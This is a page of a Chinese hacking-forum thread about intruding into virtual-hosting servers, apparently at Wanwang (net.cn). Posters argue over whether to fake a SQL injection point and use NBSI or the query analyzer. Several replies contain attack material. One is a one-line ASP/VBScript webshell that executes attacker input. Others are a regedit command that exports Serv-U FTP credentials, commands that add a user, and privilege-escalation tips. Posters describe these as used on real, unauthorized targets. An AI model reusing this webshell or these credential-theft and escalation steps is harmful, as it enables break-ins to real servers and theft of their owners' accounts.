入侵都是一个人一个思路,难道楼主就非按你的想法去入侵,你就会"好啊好啊,思路很好"的这么说了吗?
你真的疯了,谁都咬一口. 把前面的全都看完了,就一个感受.发现楼上的怀疑是XX。我按照你的思路说一下吧:
AAA站点存在注入几分钟就可得到shell,但是AAA站点还可以进行暴力破解,所以作者还是坚持使用暴力破解,结果破了100个小时终于成功了密码是1234567。然后楼下一大片人都拍掌“好思路啊!这是不用注入得shell的另一妙招!思路太巧妙啦”,连我楼上的也说“难道这种情况一定要用注入吗?破解不也是一个很好的思路吗很好的方法吗?”
[s:39] [quote][b]下面是引用wedxzaw于2005-11-30 15:56发表的:[/b]
这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的,这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限,很多命令不能用,自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点,然后用nbsi来猜解其他的信息,速度会快很多的.
其实很多人都说这个思路好,你想一想,直接在sql查询器里提交快还是伪造注入点用nbsi猜快。很明显,说思路好的人其实自己也不懂。我觉得大家和作者都很应该好好反省么省,为什么连这么简单的东西都不懂。[/quote]
很明显的,这位所谓的大哥呀.总是喜欢出尔反尔,帖子很长,我终于看完了,看完了说真的,很气愤,为我们的andyower小兄弟叫冤.他的思路是真的很好,我虽然是菜鸟,没有资格说什么,但是,我完全按照andyower兄弟的方法,拿下了不少的站,同时他也说了,的确,有的站的导出来是经过加密了的。而那么所谓的高手,总喜欢避锋,当觉得自己说错了,马上夹得紧紧的,不支声了,又转移话题那其他的地方来骂.何必呢?刚刚开始自己看错了,在那里叫呀叫,明明作者说的是快,自己却在那里骂,说大.现在作者还有楼上的各位为作者叫屈的人站了出来,那位所谓的高手,马上也从心底上意识到,这是不对的,但是又不愿意承认自己的错误,觉得对于自己这种超级牛b闪闪的人来说,这是极其的耻辱的问题,但是又不能让人觉得自己不行了,于是,又拿其他的地方来骂.何必呢?结果,一时的激动,又骂错了,说,请作者可以拿出密码是明文显示证据,大哥,看清楚一点.图上面很清楚,servu的加密方法一看知道了,一看就知道到底是不是加过密的,所谓的高手呀,发现自己又骂错了.怎么办?面子又过不去了,刚刚想开口继续大骂,另外的兄弟站了出来,于是,他狞笑着,终于让我抓到一个出气的了,又拿另外一个人出气,哎,悲哀啊.在上里发帖的人,哪一个是站在了所谓的高手的那一边的呢?哪一个不是为作者叫屈的呢?还好作者很宽宏大量,一直就没有计较到,而且还发了帖子道歉了,那个所谓的高手还不放过他,还在那里骂.哎.正常一点,用人类的方式,不要像个......(自己去听一下老罗语录就知道下面应该接什么了)
如果作者不说用查询分析器,你会想得到用吗?还是用着webshell在那里搞啊搞啊搞.而且人家作者也说得很清楚了,是为了方便而已,多一个思路难道不是好事吗?以前谁提出过伪造注入点的呢?作者这一次是在本地伪造,但是也说明了也可以在其他的地方伪造啊?难道这不是一个很好的思路吗?而所谓的高手,见很多人又在说他,终于的,又挂不住了.又再一次的站了出来,想为自己再一次辩解.到到底了,其实对于评论家,我还是很喜欢的,但是要正常一点,不要老是骂不到点子上,搞得人家作者很扭捏,搞得我们也很扭捏.
为什么所谓的高手要说,你们大家和作者要好好反省一下.看清楚了啊,是你们大家,而不是只骂作者,是大家啊,大家都不对,只有你所谓的高手是对的.哎呀,世界上就你最厉害了,就你最牛了,大家都不对,唯你是对的,我不得不佩服所谓的高手的脸皮已经到了什么境界了.我原来一直是一个潜水员,但是看到这里,我也不能不站出来说几句话.因为实在真的是,看不下去了.作者都已经道歉了,虽然这并不是他的错,因为他根本没有任何错.一个没有任何错的人.最后还给了一个犯了很多的错误的人道歉,这有什么天理呢?而所谓的高手却不饶他,每一次,骂其他的人,都要把作者都拉出来,仔细看一下每一个回复就知道了,每一次都喜欢把作者都拉出来,有意无意的都骂一下,人家作者都已经做到这一步了,多不容易啊!"高手"却还在那里汪汪汪的.
把前面的全都看完了,就一个感受.发现楼上的怀疑是XX。我按照你的思路说一下吧:
AAA站点存在注入几分钟就可得到shell,但是AAA站点还可以进行暴力破解,所以作者还是坚持使用暴力破解,结果破了100个小时终于成功了密码是1234567。然后楼下一大片人都拍掌“好思路啊!这是不用注入得shell的另一妙招!思路太巧妙啦”,连我楼上的也开始像狗一样大叫(小心咬人)“难道这种情况一定要用注入吗?破解不也是一个很好的思路吗很好的方法吗?”
我发现所谓的高手总喜欢无中生有,我终于知道为什么当年岳飞惨死了..原来是因为有了某些人...
作者为什么要暴力破解."高手",看清楚了啊,虽然已经有了所有的明文的ftp帐号密码,但是,你怎么知道哪一个是目标站点的帐号密码呢?作者很好心,写了一个程序来方便了大家,而那个所谓的高手.却以为这是暴力破解,又在那里叫了,大哥,正常一点,用人类的方式,不要像个......
劝所谓的高手好好的,认真的看一次那文章,哪有注入点给你拿webshell?因为根本就没有sql帐号密码.得到的帐号密码,是在一个个试ftp密码,得到了目标站点以后才得到的sql帐号密码,看清楚一点,不要叫了,正常一点,用人类的.......(心里明白就好了)
而且呀,所谓的高手,你要汪.要也汪到点子上,不要乱汪,我在这里说了这些,当然,所谓的高手一定不会相信我也用作者的方法成功过,但是呢,在前段时间.我无聊乱去翻blog,让我发现了这个文章,是一个blog,
[url]http://kun.7765.com/index.php?job=art&articleid=a_20051011_120300[/url]
偶可不知道他有没有名气,反正他也写出来了,看清楚.引用一下他文章的一些话.
进入万网虚拟主机 [绝密一刘]
纯粹是步andyower的后尘..
谢谢andyower提供的软件让我很容易找到了自己需要的FTP用户和密码..
其他的就不写了,有兴趣的,自己去看一下,表以为,世界上就你最牛,文章就是这样,软件就是这样,只要有一个人需要他,只要世界上有一个人觉得有帮助,他就有存在的价值,这你懂吗,何况这文章不知道对多少人有过帮助,大哥,以后做事情,正常一点,用人类的方式......... 还有呢,所谓的高手,你再怎么骂,你有人家andyower兄弟厉害吗?人家怎么说都在est发过不少的原创文章了,而且也发过不少软件,先不说那些软件对大家有没有帮助,但是,有那个能力写出软件,而且都共享出来,而且还心胸很宽,这是你可以比的吗?你有本事在那里骂,有本事你也写出一些大家都觉得非常牛的文章出来让大家都看看呀,不要总说不练,对于那位所谓的高手,我还真的注意观察了一下,只要是帖子,人家发的文章.就喜欢在把里骂.不说以前的了,就说入侵《黑客防线》官方站点之旅,这文章,.我们那位可爱的所谓的高手,心里在想,啊!终于,又出来一个人让我骂了,真爽,人家风尘浪子大哥就是再怎么样.都把黑防搞了,你有本事你也搞啊,提出疑问是好事,但是要正常一点,看清楚再骂.不看清楚再骂的话,哎..不说了
所谓的高手也许天生就是一个很牛的评论家吧,只要细心的人仔细的找找,然后呢,看一下,各位兄弟就会很深刻的发现一个很严重的问题,哪里有帖子骂人,哪里就有他那可爱的身影,除了他,没第二个人可以做得到他的那么的牛b闪闪.正常一点,用人类的方式,不要像个...... [size=20][color=red]请各位端正技术讨论的态度。言辞上注意不要带尖。有时候难免会有些情绪,但不要让矛盾升级。[/color][/size] 思路不错,不过我也没有碰到未加密的servu,也许是RP不行吧!
db_owner权限的时候,sql查询分析器不能连接的话(1433端口不开,当然可以htran反弹)
自己构造一个nbsi注入是很不错的思路的 hh.这个以前就玩过了,自己制作一个可以注入的asp文件.然后连接sql server.
然后nb来看目录.
小雨,我记得貌似在QQ里跟你说过 其实差异备份不一定是最好di.
听某大牛说还可以日志备份.好像限制了在75k左右?(是不是这个大小?)
拾人牙慧,haha 有反对意见,论坛更精彩!!!
谢谢楼主,楼主辛苦了。 为什么建立CMD 后出现这个?
Microsoft VBScript 编译器错误 错误 '800a03f6'
缺少 'End'
/bbs/data/cm.asp,行 10 WScriptShell这个组件存在,自己上传cmd上去以后,执行的net user这些命令都没有反映,我想问一下在海洋2006里应该是怎样的格式。按照楼主的方法“f:\usr\cn23002\bbs\UploadFile\2005-5\cmd.exe /c netstat -an”好像也不行,这是什么原因 [quote][b]这里是引用第[/b][color=#ff0000][40 楼][/color][b]的[color=#000066]tsgxyy[/color]于[/b]2005-10-08 22:54[b]发表的:[/b]
不对。
<script language="vbscript" runat=server>if request("#")<>"" then execute(request("#"))</script>
这句代码的成功率我在进的时候几乎都可以传上去。我没有必要说假话啊。你不信试试。在所有<% aspshell都不可以通过的时候传这个是最有效的。[/quote]
。没有人怀疑这句话的有效性 只是andyowner说过对方没有过滤了“%” 何必要写的这么长 我的服务器是Shell.Application ,WScript.Shell的名称修改,classid后面全加上12345.
这样修改之后,还有其他办法想吗?
我在想,万网只改名称,跟没改不是一样吗. [quote][b]这里是引用第[/b][color=#ff0000][54 楼][/color][b]的[color=#000066]sunwear[/color]于[/b]2005-12-14 12:46[b]发表的:[/b]
[size=20][color=red]请各位端正技术讨论的态度。言辞上注意不要带尖。有时候难免会有些情绪,但不要让矛盾升级。[/color][/size][/quote]
[font=黑体]都是人民内部矛盾,不必上岗上线![/font]
所谓的讨论是对某事件提出自己的看法以及对某人的看法提出自己的见解和不足,而不是互相抨击互相指责,应该取其精华,去其糟粕,来提高自己的知识,共享自己新的成果与见解!
赞同SUNWEAR! (俺也认识Da**eFi**) [s:45] CMD都不能执行你怎么运行netstat的? 我试了7台``Su版本都是6.0以上的`全部以MD5保存``希望作者模拟一下当时的情况` [quote][b]这里是引用第[/b][color=#ff0000][64 楼][/color][b]的[color=#000066]shu7734[/color]于[/b]2006-08-03 10:33[b]发表的:[/b]
CMD都不能执行你怎么运行netstat的?[/quote]
你没见 Wscript.shell 组件存在吗? 我非常赞同3楼的观点,有账户密码,有mssql的端口可连,那么直接可上sql查询分析器,再构造注入点文件,去跑信息,速度慢了些,还有点兜圈子的感觉. 对servu明密解释``
2个字走运``
在servu中域的高级设置把 密码加密存放去除`密码就会以明密显示`
如果有人想利用替换ServUDaemon.ini来提权`我告诉你``不行` 楼主能不能给个天使娃娃的下载连接? 强烈支持楼主的读注册表Serv-U密码的方法,我在提权的时候就用这个方法成功读出了FTP密码。不过读出来的还是加过密的! [s:66] 最经典的就是就是 自己建立个注入点啊 呵呵 楼主的二次渗透思路很好,但是请问一下,在执行
regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\"
成功的情况下“sysytem.ini”文件是空的是什么情况?
我在ASPX webshell执行的;
难道是管理员没有把帐号密码用写入注册表的方法储存? 构造注入点的想法很好.要是加在个好位置,在以后来看其实也可以算是后门了.
现在当网管真不容易啊.目标主机的权限设置还是有问题.学习,学习 记得[url]www.net.cn[/url]最初是通过oracle注射被攻破,其实是比较低级的漏洞,可以获取用户帐户信息,后来成了焦点后安全性越来越多问题被暴露。。 有待改进 [quote][b]引用第76楼[i]nxlyl[/i]于[i]2007-01-11 09:27[/i]发表的[/b]:
记得[url]www.net.cn[/url]最初是通过oracle注射被攻破,其实是比较低级的漏洞,可以获取用户帐户信息,后来成了焦点后安全性越来越多问题被暴露。。 有待改进[/quote]
貌似 [url]www.net.cn[/url] 用的是 MSSQL吧; [quote]引用第13楼堕落青年于2005-09-30 20:33发表的 :
我今天入侵了一个虚拟主机```用wsh执行命令,regedit /e "e:wwwaamima.ini" "HKEY_LOCAL_MACHINESOFTWAREcat softserv-u"
"e:wwwaamima.ini"是iis的目录,运行webshell里没反应(海洋06wsh可以看net user,和netstat -an)
请问运行那个命令要什么权限/?guest?user?还是怎么的?[/quote]
guest就可以 思想很好,但是我也确实没有遇到过没有加密的servu! *** 作者被禁止或删除 内容自动屏蔽 *** [quote]引用第49楼wedxzaw于2005-11-30 15:56发表的 :
这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的,这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限,很多命令不能用,自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点,然后用nbsi来猜解其他的信息,速度会快很多的.
其实很多人都说这个思路好,你想一想,直接在sql查询器里提交快还是伪造注入点用nbsi猜快。很明显,说思路好的人其实自己也不懂。我觉得大家和作者都很应该好好反省么省,为什么连这么简单的东西都不懂。[/quote]
我忍住看了这么长的讨论。大家说法不一。我认为.构造注入点用NBSI.比用WEBSHELL方便很多。如果你用WEBSHELL猜解目录或者其他信息的话。估计会累死你.所以这地方选用NBSI.还是比较明智的选择....(个人观点。) 大哥 我请教一个问题啊!
我有以web站点的mssql数据库db权限的,我打开它的网站[url]http://ip[/url] 禁止访问,就是说没有对外的可浏览的站点,我按照你说的方法,nbsi或者其他工具都可以注入,但是就是无法猜出目录,还请指教!
谢谢! [s:265] 高手啊,不敢比 [quote]引用第49楼wedxzaw于2005-11-30 15:56发表的 :
这次万网害死人了吧!既然让我得到了要进攻的网站的另外一台服务器.220.194.*.*,这台服务器是独立的,旁注过,没有成功,因为不存在另外的网站,这一次,看你往哪跑,一起把他拿下!因为有些原因,从现在开始不提供截图了,希望可以谅解.既然已经得到了数据库的帐号密码,而且他的网站是直接用asp连接上去的,这样说,一定会开了ms sql的端口的.用sql器连接上去,发现自己的权限是db_owner的权限,很多命令不能用,自己手工读去对方的web路径又太麻烦了,而且我也想看看他的结构,既然我有了sql帐号的密码.他的服务器上没有注入漏洞,我可以帮他伪造一个,伪造一个注入点,然后用nbsi来猜解其他的信息,速度会快很多的.
其实很多人都说这个思路好,你想一想,直接在sql查询器里提交快还是伪造注入点用nbsi猜快。很明显,说思路好的人其实自己也不懂。我觉得大家和作者都很应该好好反省么省,为什么连这么简单的东西都不懂。[/quote]
个人都有个人的爱好 他觉得构造注入点快就构造注入点 用查询分析器快就用查询分析呗 个人感觉熟悉sql代码的话 查询分析器快 hehe 真有你的 [s:269] [s:269] 顶你一个,思路很不错了。 学习中…… [quote]引用第17楼wedxzaw于2005-10-03 22:17发表的 :
还有,导出system.ini那部分,servu密码应该是md5加密的,怎么会是明文的。作者可以重现密码明文保存的环节吗?[/quote]
[s:289]serr-u的密码是MD5加密的? 我怎么感觉不像啊?在ServUDaemon.ini保存的密码是34位的,MD5加密不是只有16位和32位么?小弟才学,很多地方不懂......[s:267]
我拿到个WEBSHELL,服务器信息:IIS5.0,C盘的根目录可以创建文件夹和上传文件,但是C:\Program Files 等几个文件夹可以浏览不可以写入文件,SERV-U就安装在C:\Program Files下,修改ServUDaemon.ini是不行了,查看SERV-U是5.0的,试过webshell上的SERV-U的提权了,不成功,估计默认密码是被改掉了.
进入命令行,执行ipconfig,晕,提示"没有权限",自己上传了一个CMD上去,WScript.Shell执行后发现只能执行ipcongfig net user查看类的命令,当我使用net user 731 731 /add加用户命令,命令无回显,失败了. 不知道还有什么办法可以提权了?
CMD下执行 regedit /e "C:\Documents and Settings\All Users\Documents\system.ini" "HKEY_LOCAL_MACHINE\SOFTWARE\cat soft\serv-u\" 一样无回显,看了下也没成功导出, 这可怎么办丫?作者在第一次入侵中的目的是拿到那个站,FTP里的资料就此结束了.没提到提权......很郁闷丫. [quote]引用第80楼lafkkk于2008-01-18 05:22发表的 :
大哥 我请教一个问题啊!
我有以web站点的mssql数据库db权限的,我打开它的网站[url]http://ip[/url] 禁止访问,就是说没有对外的可浏览的站点,我按照你说的方法,nbsi或者其他工具都可以注入,但是就是无法猜出目录,还请指教!
谢谢![/quote]
xp_dirtree存储过程被删了. [quote]引用第86楼no.731于2008-01-30 00:24发表的 :
[s:289]serr-u的密码是MD5加密的? 我怎么感觉不像啊?在ServUDaemon.ini保存的密码是34位的,MD5加密不是只有16位和32位么?小弟才学,很多地方不懂......[s:267]
我拿到个WEBSHELL,服务器信息:IIS5.0,C盘的根目录可以创建文件夹和上传文件,但是C:Program Files 等几个文件夹可以浏览不可以写入文件,SERV-U就安装在C:Program Files下,修改ServUDaemon.ini是不行了,查看SERV-U是5.0的,试过webshell上的SERV-U的提权了,不成功,估计默认密码是被改掉了.
.......[/quote]
请您仔细的看讨论内容,代码罐头已经说了ServU的加密方法。 [quote]引用第38楼代码罐头于2005-10-07 10:47发表的 :
>>谁都知道ServUDaemon.ini和注册表里存放的都是加密的密码
老兄只是使用了默认设置而已.
SERVU可以使用多种配置方法.其中包括对密码明文不进行加密
很多主机管理系统由于不知道SERVU的密码加密方法(SALT+MD5)
.......[/quote]
这点知道了,谢谢了,SERVU的密码加密方法(SALT+MD5)不知道这种加密方法有的破没? [s:264] 今天我朋友人品不错,直接读出来一个明文的,不过我读的时候就成乱码了. [s:268] [s:269] [s:269] [s:269] 我支持 你顶
页:
1
[2]